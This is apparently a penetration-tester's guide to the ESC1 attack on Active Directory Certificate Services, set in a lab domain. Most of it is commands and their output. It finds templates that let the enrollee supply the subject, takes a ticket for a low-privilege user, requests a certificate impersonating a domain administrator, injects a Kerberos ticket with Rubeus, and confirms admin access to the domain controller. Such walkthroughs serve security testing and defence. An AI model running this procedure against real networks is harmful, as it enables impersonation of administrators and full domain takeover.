ESC1


ESC1 - Abuse Active Directory Certificate Services.

This is a little guide on abusing Active Directory Certificate Services (AD CS) with practical examples.

PLEASE NOTE: Check if Certipy is an option for you since this is easier to use in general.

Cheatsheet about the different AD-CS’s ESC presented by SpecterOps

Install Certi

Please install Certi

Checking vulnerable templates

You want to look at a certificate with the msPKI-Certificate-Name-Flag: (0x1) ENROLLEE_SUPPLIES_SUBJECT flag set. This gives the option to set an alternative name for the certificate AKA impersonating any user. Also the ‘Enrollment Rights’ for your current user must be available, for example Domain Users or the membership of your current user specifically.

Note: if your current user has ‘Write Property’ rights, it is possible to give the ‘Enrollment Rights’ to yourself.

$ certi.py list 'offsec.nl/johndo-lowpriv' --dc-ip DC01PKI.offsec.nl --vuln --enable
Password:
[*] Templates

Name: User
Schema Version: 1
Enroll Services: offsec-DC01PKI-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate
msPKI-Certificate-Name-Flag: (0x-5a000000) SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
[...]

Name: Administrator
Schema Version: 1
Enroll Services: offsec-DC01PKI-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate
msPKI-Certificate-Name-Flag: (0x-5a000000) SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
[...]

Name: Machine
Schema Version: 1
Enroll Services: offsec-DC01PKI-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate
msPKI-Certificate-Name-Flag: (0x18000000) SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
[...]

Name: SubCA
Schema Version: 1
Enroll Services: offsec-DC01PKI-CA
Vulnerabilities: ESC1 - SAN Impersonation, ESC2 - Any Purpose, ESC3.2 - Use Agent Certificate
msPKI-Certificate-Name-Flag: (0x1) ENROLLEE_SUPPLIES_SUBJECT
[...]

Name: UsersOffsecAD
Schema Version: 2
Enroll Services: offsec-DC01PKI-CA
Vulnerabilities: ESC1 - SAN Impersonation
msPKI-Certificate-Name-Flag: (0x1) ENROLLEE_SUPPLIES_SUBJECT
msPKI-Enrollment-Flag: (0x9) INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
msPKI-RA-Signature: 0
pKIExtendedKeyUsage: Client Authentication
msPKI-Certificate-Application-Policy: Client Authentication
SD Owner: S-1-5-21-497837788-612300594-3587273769-500 offsec\Administrator
Permissions
  Enrollment Permissions
    Enrollment Rights
      S-1-5-21-497837788-612300594-3587273769-519 offsec\Enterprise Admins
      S-1-5-21-497837788-612300594-3587273769-512 offsec\Domain Admins
      S-1-5-21-497837788-612300594-3587273769-513 offsec\Domain Users
  Write Permissions
    Write Owner
      S-1-5-21-497837788-612300594-3587273769-519 offsec\Enterprise Admins
      S-1-5-21-497837788-612300594-3587273769-500 offsec\Administrator
      S-1-5-21-497837788-612300594-3587273769-512 offsec\Domain Admins
    Write DACL
      S-1-5-21-497837788-612300594-3587273769-519 offsec\Enterprise Admins
      S-1-5-21-497837788-612300594-3587273769-500 offsec\Administrator
      S-1-5-21-497837788-612300594-3587273769-512 offsec\Domain Admins
    Write Property
      S-1-5-21-497837788-612300594-3587273769-519 offsec\Enterprise Admins
      S-1-5-21-497837788-612300594-3587273769-500 offsec\Administrator
      S-1-5-21-497837788-612300594-3587273769-512 offsec\Domain Admins
      S-1-5-21-497837788-612300594-3587273769-513 offsec\Domain Users

15:30:21 in certi on  main took 5s

Exploiting the configuration

Getting TGT ticket

getTGT.py 'offsec.nl/johndo-lowpriv:Welkom1234' 

Make the ticket available for the current session.

export KRB5CCNAME=johndo-lowpriv.ccache

Requesting certificate with alternative name

Parameters:

  • offsec-DC01PKI-CA - is found in the template Enroll Services field
  • -k - to use kerberos authentication
  • -n - ’no-pass’ for use with -k
  • --alt-name - the user you want to impersonate, this will likely be a ‘Domain Admin’ or equal
  • --template - the vulnerable template name
$ python3 certi.py req 'offsec.nl/johndo-lowpriv@DC01PKI.offsec.nl' offsec-DC01PKI-CA -k -n --alt-name johnDomainAdmin --template UsersOffsecAD
[*] Service: offsec-DC01PKI-CA
[*] Template: UsersOffsecAD
[*] Username: johndo-lowpriv
[*] Alternative Name: johnDomainAdmin

[*] Response: 0x3 Issued

[*] Cert subject: CN=johndo-lowpriv
[*] Cert issuer: CN=offsec-DC01PKI-CA,DC=offsec,DC=local
[*] Cert Serial: 1300000820BF3CEC69D8FEB673000200000820
[*] Cert Extended Key Usage: Client Authentication
[+] Cert Altname: johnDomainAdmin@offsec.nl

[*] Saving certificate in johnDomainAdmin@offsec.nl.pfx (password: admin)

Requesting TGT for alternative user

Attachments

Move the .pfx to a Windows machine and start PowerShell for Rubeus.exe.

Z:\Rubeus.exe asktgt /domain:offsec.nl /dc:DC01PKI.offsec.nl /user:johnDomainAdmin /certificate:Z:\johnDomainAdmin@offsec.nl.pfx /password:admin /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=johndo-lowpriv
[*] Building AS-REQ (w/ PKINIT preauth) for: 'offsec.nl\johnDomainAdmin'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGPDCCBjig[REDACTED]FuZC5sb2NhbA==

[+] Ticket successfully imported!

  ServiceName              :  krbtgt/offsec.nl
  ServiceRealm             :  offsec.nl
  UserName                 :  johnDomainAdmin
  UserRealm                :  offsec.nl
  StartTime                :  1/19/2022 6:45:25 AM
  EndTime                  :  1/19/2022 4:45:25 PM
  RenewTill                :  1/26/2022 6:45:25 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  h85ETS[REDACTED]Za+4GEw==
  ASREP (key)              :  AFC858FA[REDACTED]49D1DE

With klist you can check the requested ticket is available.

PS C:\Windows\System32\WindowsPowerShell\v1.0> klist

Current LogonId is 0:0x58f55

Cached Tickets: (1)

#0>     Client: johnDomainAdmin @ offsec.nl
        Server: krbtgt/offsec.nl @ offsec.nl
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 1/19/2022 6:45:25 (local)
        End Time:   1/19/2022 16:45:25 (local)
        Renew Time: 1/26/2022 6:45:25 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

Verify the requested ticket is usable

PS C:\Windows\System32\WindowsPowerShell\v1.0> whoami
offsec\johndo-lowpriv

PS Z:\> dir  \\DC01PKI.offsec.nl\c$


    Directory: \\DC01PKI.offsec.nl\c$


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        12/11/2019  12:08 AM                PerfLogs
d-r---         1/11/2022   1:28 AM                Program Files
d-----         1/11/2022   1:29 AM                Program Files (x86)
d-r---         1/18/2022  12:44 AM                Users
d-----         1/19/2022   6:25 AM                Windows

Convert the ticket from base to file

[IO.File]::WriteAllBytes("Z:\johnDomainAdmin.kirbi", [Convert]::FromBase64String("doIGPDCCBjig[REDACTED]FuZC5sb2NhbA=="))

Convert .kirbi to .ccache

Use ticket_converter.

python3 ticket_converter.py johnDomainAdmin.kirbi johnDomainAdmin.ccache
Converting kirbi => ccache

Make the .ccache available for Kerberos authentication.

export KRB5CCNAME=admin.ccache

CrackMapExec

$ cme smb DC01PKI.offsec.nl --use-kcache         
SMB         DC01PKI.offsec.nl 445    DC01PKI         [*] Windows Server 2019 Standard 17763 x64 (name:DC01PKI) (domain:offsec.nl) (signing:True) (SMBv1:True)
SMB         DC01PKI.offsec.nl 445    DC01PKI         [+] offsec.nl\johnDomainAdmin (Pwn3d!)

URL List